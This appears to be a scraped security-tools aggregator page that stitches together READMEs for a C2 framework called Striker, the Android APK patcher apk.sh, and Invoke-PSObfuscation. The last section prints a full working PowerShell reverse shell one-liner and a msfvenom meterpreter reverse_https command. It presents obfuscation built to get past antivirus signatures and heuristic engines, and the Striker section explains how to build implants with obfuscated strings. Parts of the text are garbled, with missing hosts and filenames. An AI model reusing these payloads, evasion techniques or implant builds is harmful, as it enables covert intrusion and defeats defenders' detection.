  • Supports multiple operators.
  • Most features exposed through the REST API, making it easy to automate things.
  • Uses web sockets for faster comms.

C) User Interface

  • Smooth and reactive UI thanks to Svelte and SocketIO.
  • Easy to configure as it compiles into static HTML, JavaScript, and CSS files, which can be hosted with even the most basic web server you can find.
  • Teamchat feature to communicate with other operators over text.

Installing Striker

Clone the repo;

$ git clone
$ cd Striker

The codebase is divided into 4 independent sections;

1. The C2 Server / Backend

This handles all server-side logic for both operators and agents. It is a NodeJS application made with;

  • express - For the REST API.
  • - For Web Socket communtication.
  • mongoose - For connecting to MongoDB.
  • multer - For handling file uploads.
  • bcrypt - For hashing user passwords.

The source code is in the backend/ directory. To setup the server;

  1. Setup a MongoDB database;

Striker uses MongoDB as backend database to store all important data. You can install this locally on your machine using this guide for debian-based distros, or create a free one with MongoDB Atlas (A database-as-a-service platform).

  1. Move into the source directory;
$ cd backend
  1. Install dependencies;
$ npm install
  1. Create a directory for static files;
$ mkdir static

You can use this folder to host static files on the server. This should also be where your UPLOAD_LOCATION is set to in the .env file (more on this later), but this is not necessary. Files in this directory will be publicly accessible under the path /static/.

  1. Create a .env file;

NOTE: Values between < and > are placeholders. Replace them with appropriate values (including the <>). For fields that require random strings, you can generate them easily using;

$ head -c 100 /dev/urandom | sha256sum
DB_URL=<your MongoDB connection URL>
HOST=<host to listen on (default:>
PORT=<port to listen on (default: 3000)>
SECRET=<random string to use for signing session cookies and encrypting session data>
ORIGIN_URL=<full URL of the server you will be hosting the frontend at. Used to setup CORS>
REGISTRATION_KEY=<random string to use for authentication during signup>
MAX_UPLOAD_SIZE=<max file upload size, in bytes>
UPLOAD_LOCATION=<directory to store uploaded files to (default: static)>
SSL_KEY=<your SSL key file (optional)>
SSL_CERT=<your SSL cert file (optional)>

Note that SSL_KEY and SSL_CERT are optional. If any is not defined, a plain HTTP server will be created. This helps avoid needless overhead when running the server behind an SSL-enabled reverse proxy on the same host.

  1. Start the server;
$ node index.js
[12:45:30 PM] Connecting to backend database...
[12:45:31 PM] Starting HTTP server...
[12:45:31 PM] Server started on port: 3000

2. The Frontend

This is the web UI used by operators. It is a single page web application written in Svelte, and the source code is in the frontend/ directory.

To setup the frontend;

  1. Move into the source directory;
$ cd frontend
  1. Install dependencies;
$ npm install
  1. Create a .env file with the variable VITE_STRIKER_API set to the full URL of the C2 server as configured above;
  1. Build;
$ npm run build

The above will compile everything into a static web application in dist/ directory. You can move all the files inside into the web root of your web server, or even host it with a basic HTTP server like that of python;

$ cd dist
$ python3 -m http.server 8000
  1. Signup;
  • Open the site in a web browser. You should see a login page.
  • Click on the Register button.
  • Enter a username, password, and the registration key in use (see REGISTRATION_KEY in backend/.env)

This will create a standard user account. You will need an admin account to access some features. Your first admin account must be created manually, afterwards you can upgrade and downgrade other accounts in the Users tab of the web UI.

To create your first admin account;

  • Connect to the MongoDB database used by the backend.
  • Update the users collection and set the admin field of the target user to true;

There are different ways you can do this. If you have mongo available in you CLI, you can do it using;

$ mongo <your MongoDB connection URL>
> db.users.updateOne({username: "<your username>"}, {$set: {admin: true}})

You should get the following response if it works;

{ "acknowledged" : true, "matchedCount" : 1, "modifiedCount" : 1 }

You can now login :)

3. The C2 Redirector

A) Dumb Pipe Redirection

A dumb pipe redirector written for Striker is available at redirector/ Obviously, this will only work for plain HTTP traffic, or for HTTPS when SSL verification is disabled (you can do this by enabling the INSECURE_SSL macro in the C agent).

The following example listens on port 443 on all interfaces and forward to on port 443;

$ cd redirector
$ ./
[*] Starting redirector on
[+] Listening for connections...

B) Nginx Reverse Proxy as Redirector

  1. Install Nginx;
$ sudo apt install nginx
  1. Create a vhost config (e.g: /etc/nginx/sites-available/striker);


  • <domain-name> - This is your server's FQDN, and should match the one in you SSL cert.
  • <ssl-cert> - The SSL cert file to use.
  • <ssl-key> - The SSL key file to use.
  • <c2-server> - The full URL of the C2 server to forward requests to.

WARNING: client_max_body_size should be as large as the size defined by MAX_UPLOAD_SIZE in your backend/.env file, or uploads for large files will fail.

server {
listen 443 ssl;
server_name <domain-name>;
ssl_certificate <ssl-cert>;
ssl_certificate_key <ssl-key>;
client_max_body_size 100M;
access_log /var/log/nginx/striker.log;

location / {
proxy_pass <c2-server>;
proxy_redirect off;
proxy_ssl_verify off;
proxy_read_timeout 90;
proxy_http_version 1.0;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
  1. Enable it;
$ sudo ln -s /etc/nginx/sites-available/striker /etc/nginx/sites-enabled/striker
  1. Restart Nginx;
$ sudo service nginx restart

Your redirector should now be up and running on port 443, and can be tested using (assuming your FQDN is striker.local);

$ curl https://striker.local

If it works, you should get the 404 response used by the backend, like;

{"error":"Invalid route!"}

4. The Agents (Implants)

A) The C Agent

These are the implants used by Striker. The primary agent is written in C, and is located in agent/C/. It supports both linux and windows hosts. The linux agent depends externally on libcurl, which you will find installed in most systems.

The windows agent does not have an external dependency. It uses wininet for comms, which I believe is available on all windows hosts.

  1. Building for linux

Assuming you're on a 64 bit host, the following will build for 64 host;

$ cd agent/C
$ mkdir bin
$ make

To build for 32 bit on 64;

$ sudo apt install gcc-multilib
$ make arch=32

The above compiles everything into the bin/ directory. You will need only two files to generate working implants;

  • bin/stub - This is the agent stub that will be used as template to generate working implants.
  • bin/builder - This is what you will use to patch the agent stub to generate working implants.

The builder accepts the following arguments;

$ ./bin/builder 
[-] Usage: ./bin/builder <url> <auth_key> <delay> <stub> <outfile>


  • <url> - The server to report to. This should ideally be a redirector, but a direct URL to the server will also work.
  • <auth_key> - The authentication key to use when connecting to the C2. You can create this in the auth keys tab of the web UI.
  • <delay> - Delay between each callback, in seconds. This should be at least 2, depending on how noisy you want it to be.
  • <stub> - The stub file to read, bin/stub in this case.
  • <outfile> - The output filename of the new implant.


$ ./bin/builder https://localhost:3000 979a9d5ace15653f8ffa9704611612fc 5 bin/stub bin/striker
[*] Obfuscating strings...
[+] 69 strings obfuscated :)
[*] Finding offsets of our markers...
[+] Offsets:
URL: 0x0000a2e0
OBFS Key: 0x0000a280
Auth Key: 0x0000a2a0
Delay: 0x0000a260
[*] Patching...
[+] Operation completed!
  1. Building for windows

You will need MinGW for this. The following will install the 32 and 64 bit dev windows environment;

$ sudo apt install mingw-w64

Build for 64 bit;

$ cd agent/C
$ mdkir bin
$ make target=win

To compile for 32 bit;

$ make target=win arch=32

This will compile everything into the bin/ directory, and you will have the builder and the stub as bin\stub.exe and bin\builder.exe, respectively.

B) The Python Agent

Striker also comes with a self-contained python agent (tested on python 2.7.16 and 3.7.3). This is located at agent/python/. Only the most basic features are implemented in this agent. Useful for hosts that can't run the C agent but have python installed.

There are 2 file in this directory;

  • - This is the payload stub to pass to the builder.
  • - This is what you'll be using to generate an implant.

Usage example:

$ ./
[-] Usage: <url> <auth_key> <delay> <stub> <outfile>
# The following will generate a working payload as ``
$ ./ http://localhost:3000 979a9d5ace15653f8ffa9704611612fc 2
[*] Loading agent stub...
[*] Writing configs...
[+] Agent built successfully:
# Run it
$ python3

Getting Started

After following the above instructions, Striker should now be ready for use. Kindly go through the usage guide. Have fun, and happy hacking!


If you like the project, consider helping me turn coffee into code!

Apk.Sh - Makes Reverse Engineering Android Apps Easier, Automating Some Repetitive Tasks Like Pulling, Decoding, Rebuilding And Patching An APK is a Bash script that makes reverse engineering Android apps easier, automating some repetitive tasks like pulling, decoding, rebuilding and patching an APK.

Features basically uses apktool to disassemble, decode and rebuild resources and some bash to automate the frida gadget injection process. It also supports app bundles/split APKs.

  • 
    Patching APKs to load on start.
  • 
    Support for app bundles/split APKs.
  • 
    Disassembling resources to nearly original form with apktool.
  • ο”©
    Rebuilding decoded resources back to binary APK/JAR with apktool.
  • ️
    Code signing the apk with apksigner.
  • ο–₯️
    Multiple arch support (arm, arm64, x86, x86_64).
  • ο“΅
    No rooted Android device needed.

Getting started

Pulling an APK from a device is simple as running ./ pull <package_name>

Decoding an APK is simple as running ./ decode <apk_name>

Rebuilding an APK is simple as running ./ build <apk_dir> pull pull pull an APK from a device. It supports app bundles/split APKs, which means that split APKs will be joined in a single APK (this is useful for patching). If the package is an app bundle/split APK, will combine the APKs into a single APK, fixing all public resource identifiers. patch patch patch an APK to load on start. is a Frida's shared library meant to be loaded by programs to be instrumented (when the Injected mode of operation isn’t suitable). By simply loading the library it will allow you to interact with it using existing Frida-based tools like frida-trace. It also supports a fully autonomous approach where it can run scripts off the filesystem without any outside communication.

Patching an APK is simple as running ./ patch <apk_name> --arch arm.

You can calso specify a Frida gadget configuration in a json ./ patch <apk_name> --arch arm --gadget-conf <config.json>

Frida's Gadget configurations

In the default interaction, Frida Gadget exposes a frida-server compatible interface, listening on localhost:27042 by default. In order to achieve early instrumentation Frida let Gadget’s constructor function block until you either attach() to the process, or call resume() after going through the usual spawn() -> attach() -> ...apply instrumentation... steps.

If you don’t want this blocking behavior and want to let the program boot right up, or you’d prefer it listening on a different interface or port, you can customize this through a json configuration file.

The default configuration is:

"interaction": {
"type": "listen",
"address": "",
"port": 27042,
"on_port_conflict": "fail",
"on_load": "wait"

You can pass the gadget configuration file to with the --gadget-conf option.

Script interaction

A typically suggested configuration might be:

"interaction": {
"type": "script",
"path": "/data/local/tmp/script.js",

script.js could be something like:

var android_log_write = new NativeFunction(
Module.getExportByName(null, '__android_log_write'),
['int', 'pointer', 'pointer']

var tag = Memory.allocUtf8String("[frida-script][ax]");

var work = function() {
setTimeout(function() {
android_log_write(3, tag, Memory.allocUtf8String("ping @ " +;
}, 1000);


android_log_write(3, tag, Memory.allocUtf8String(">--(O.o)-<"));

adb push script.js /data/local/tmp

./ patch <apk_name> --arch arm --gadget-conf <config.json>

adb install file.gadget.apk


Add the following code to print to logcat the console.log output of any script from the frida codeshare when using the Script interaction type.

// print to logcat the console.log output
// see:
var android_log_write = new NativeFunction(
Module.getExportByName(null, '__android_log_write'),
['int', 'pointer', 'pointer']
var tag = Memory.allocUtf8String("[frida-script][ax]");
console.log = function(str) {
android_log_write(3, tag, Memory.allocUtf8String(str));


  • apktool
  • apksigner
  • unxz
  • zipalign
  • aapt
  • adb




pull	Pull an apk from device/emulator.
decode Decode an apk.
build Re-build an apk.
patch Patch an apk.
rename Rename the apk package.


-a, --arch <arch> Specify the target architecture, mandatory when patching.

-g, --gadget-conf <json_file> Specify a frida-gadget configuration file, optional when patching.

-n, --net Add a permissive network security config when building, optional. It can be used with patch, pull and rename also.

-s, --safe Do not decode resources when decoding (i.e. apktool -r). Cannot be used when patching.

-d, --no-dis Do not disassemble dex, optional when decoding (i.e. apktool -s). Cannot be used when patching.

Links of Interest

Invoke-PSObfuscation - An In-Depth Approach To Obfuscating The Individual Components Of A PowerShell Payload Whether You'Re On Windows Or Kali Linux

Traditional obfuscation techniques tend to add layers to encapsulate standing code, such as base64 or compression. These payloads do continue to have a varied degree of success, but they have become trivial to extract the intended payload and some launchers get detected often, which essentially introduces chokepoints.

The approach this tool introduces is a methodology where you can target and obfuscate the individual components of a script with randomized variations while achieving the same intended logic, without encapsulating the entire payload within a single layer. Due to the complexity of the obfuscation logic, the resulting payloads will be very difficult to signature and will slip past heuristic engines that are not programmed to emulate the inherited logic.

While this script can obfuscate most payloads successfully on it's own, this project will also serve as a standing framework that I will to use to produce future functions that will utilize this framework to provide dedicated obfuscated payloads, such as one that only produces reverse shells.

I wrote a blog piece for Offensive Security as a precursor into the techniques this tool introduces. Before venturing further, consider giving it a read first:

Dedicated Payloads

As part of my on going work with PowerShell obfuscation, I am building out scripts that produce dedicated payloads that utilize this framework. These have helped to save me time and hope you find them useful as well. You can find them within their own folders at the root of this repository.

  1. Get-ReverseShell
  2. Get-DownloadCradle
  3. Get-Shellcode


Like many other programming languages, PowerShell can be broken down into many different components that make up the executable logic. This allows us to defeat signature-based detections with relative ease by changing how we represent individual components within a payload to a form an obscure or unintelligible derivative.

Keep in mind that targeting every component in complex payloads is very instrusive. This tool is built so that you can target the components you want to obfuscate in a controlled manner. I have found that a lot of signatures can be defeated simply by targeting cmdlets, variables and any comments. When using this against complex payloads, such as print nightmare, keep in mind that custom function parameters / variables will also be changed. Always be sure to properly test any resulting payloads and ensure you are aware of any modified named paramters.

Component types such as pipes and pipeline variables are introduced here to help make your payload more obscure and harder to decode.

Supported Types

  • Aliases (iex)
  • Cmdlets (New-Object)
  • Comments (# and <# #>)
  • Integers (4444)
  • Methods ($client.GetStream())
  • Namespace Classes (System.Net.Sockets.TCPClient)
  • Pipes (|)
  • Pipeline Variables ($_)
  • Strings ("value" | 'value')
  • Variables ($client)


Each component has its own dedicated generator that contains a list of possible static or dynamically generated values that are randomly selected during each execution. If there are multiple instances of a component, then it will iterative each of them individually with a generator. This adds a degree of randomness each time you run this tool against a given payload so each iteration will be different. The only exception to this is variable names.

If an algorithm related to a specific component starts to cause a payload to flag, the current design allows us to easily modify the logic for that generator without compromising the entire script.

$Picker = 1..6 | Get-Random
Switch ($Picker) {
1 { $NewValue = 'Stay' }
2 { $NewValue = 'Off' }
3 { $NewValue = 'Ronins' }
4 { $NewValue = 'Lawn' }
5 { $NewValue = 'And' }
6 { $NewValue = 'Rocks' }


This framework and resulting payloads have been tested on the following operating system and PowerShell versions. The resulting reverse shells will not work on PowerShell v2.0

PS Version OS Tested Invoke-PSObfucation.ps1 Reverse Shell
7.1.3 Kali 2021.2 Supported Supported
5.1.19041.1023 Windows 10 10.0.19042 Supported Supported
5.1.21996.1 Windows 11 10.0.21996 Supported Supported

Usage Examples

CVE-2021-34527 (PrintNightmare)

└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.
Type 'help' to get help.

PS /home/tristram> . ./Invoke-PSObfuscation.ps1
PS /home/tristram> Invoke-PSObfuscation -Path .\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printnightmare.ps1

>> Layer 0 Obfuscation

[*] Obfuscating namespace classes
[*] Obfuscating cmdlets
[*] Obfuscating variables
[-] -DriverName is now -QhYm48JbCsqF
[-] -NewUser is now -ybrcKe
[-] -NewPassword is now -ZCA9QHerOCrEX84gMgNwnAth
[-] -DLL is now -dNr
[-] -ModuleName is now -jd
[-] -Module is now -tu3EI0q1XsGrniAUzx9WkV2o
[-] -Type is now -fjTOTLDCGufqEu
[-] -FullName is now -0vEKnCqm
[-] -EnumElements is now -B9aFqfvDbjtOXPxrR< br/>[-] -Bitfield is now -bFUCG7LB9gq50p4e
[-] -StructFields is now -xKryDRQnLdjTC8
[-] -PackingSize is now -0CB3X
[-] -ExplicitLayout is now -YegeaeLpPnB
[*] Removing comments
[*] Writing payload to o-printnightmare.ps1
[*] Done

PS /home/tristram>

PowerShell Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient("",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Generator 2 >> 4444 >> $(0-0+0+0-0-0+0+4444) Generator 1 >> 65535 >> $((65535)) [*] Obfuscating strings Generator 2 >> >> $([char](16*49/16)+[char](109*50/109)+[char](0+55-0)+[char](20*46/20)+[char](0+48-0)+[char](0+46-0)+[char](0+48-0)+[char](0+46-0)+[char](51*49/51)) Generator 2 >> PS >> $([char](1*80/1)+[char](86+83-86)+[char](0+32-0)) Generator 1 >> > >> ([string]::join('', ( (62,32) |%{ ( [char][int] $_)})) | % {$_}) [*] Obfuscating cmdlets Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Generator 1 >> Out-String >> & (("Tpltq1LeZGDhcO4MunzVC5NIP-vfWow6RxXSkbjYAU0aJm3KEgH2sFQr7i8dy9B")[13,16,3,25,35,3,55,57,17,49] -join '') [*] Writing payload to /home/tristram/obfuscated.ps1 [*] Done" dir="auto">
└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.
Type 'help' to get help.

PS /home/tristram> . ./Invoke-PSObfuscation.ps1
PS /home/tristram> Invoke-PSObfuscation -Path ./revshell.ps1 -Integers -Cmdlets -Strings -ShowChanges

>> Layer 0 Obfuscation

[*] Obfuscating integers
Generator 2 >> 4444 >> $(0-0+0+0-0-0+0+4444)
Generator 1 >> 65535 >> $((65535))
[*] Obfuscating strings
Generator 2 >> >> $([char](16*49/16)+[char](109*50/109)+[char](0+55-0)+[char](20*46/20)+[char](0+48-0)+[char](0+46-0)+[char](0+48-0)+[char](0+46-0)+[char](51*49/51))
Generator 2 >> PS >> $([char](1 *80/1)+[char](86+83-86)+[char](0+32-0))
Generator 1 >> > >> ([string]::join('', ( (62,32) |%{ ( [char][int] $_)})) | % {$_})
[*] Obfuscating cmdlets
Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_})
Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_})
Generator 1 >> Out-String >> & (("Tpltq1LeZGDhcO4MunzVC5NIP-vfWow6RxXSkbjYAU0aJm3KEgH2sFQr7i8dy9B")[13,16,3,25,35,3,55,57,17,49] -join '')
[*] Writing payload to /home/tristram/obfuscated.ps1
[*] Done

Obfuscated PowerShell Reverse Shell

Meterpreter PowerShell Shellcode

└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.
Type 'help' to get help.

PS /home/kali> msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 EXITFUNC=thread -f ps1 -o meterpreter.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 686 bytes
Final size of ps1 file: 3385 bytes
Saved as: meterpreter.ps1
PS /home/kali> . ./Invoke-PSObfuscation.ps1
PS /home/kali> Invoke-PSObfuscation -Path ./meterpreter.ps1 -Integers -Variables -OutFile o-meterpreter.ps1

>> Layer 0 Obfuscation

[*] Obfuscating integers
[*] Obfuscating variables
[*] Writing payload to o-meterpreter.ps1
[*] Done

Comment-Based Help

Transforms PowerShell scripts into something obscure, unclear, or unintelligible.

Where most obfuscation tools tend to add layers to encapsulate standing code, such as base64 or compression,
they tend to leave the intended payload intact, which essentially introduces chokepoints. Invoke-PSObfuscation
focuses on replacing the existing components of your code, or layer 0, with alternative values.

A user provided PowerShell payload via a flat file.

The all switch is used to engage every supported component to obfuscate a given payload. This action is very intrusive
and could result in your payload being broken. There should be no issues when using this with the vanilla reverse
shell. However, it's recommended to target specific components with more advanced payloads. Keep in mind that some of
the generators introduced in this script may even confuse your ISE so be sure to test properly.

The aliases switch is used to instruct the function to obfuscate aliases.

The cmdlets switch is used to instruct the function to obfuscate cmdlets.

The comments switch is used to instruct the function to remove all comments.

The integers switch is used to instruct the function to obfuscate integers.

The methods switch is used to instruct the function to obfuscate method invocations.

.PARAMETER NamespaceClasses
The namespaceclasses switch is used to instruct the function to obfuscate namespace classes.

The pipes switch is used to in struct the function to obfuscate pipes.

.PARAMETER PipelineVariables
The pipeline variables switch is used to instruct the function to obfuscate pipeline variables.

.PARAMETER ShowChanges
The ShowChanges switch is used to instruct the script to display the raw and obfuscated values on the screen.

The strings switch is used to instruct the function to obfuscate prompt strings.

.PARAMETER Variables
The variables switch is used to instruct the function to obfuscate variables.

PS C:\> Invoke-PSObfuscation -Path .\revshell.ps1 -All

PS C:\> Invoke-PSObfuscation -Path .\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printernightmare.ps1

System.String, System.String

Additional information abo ut the function.
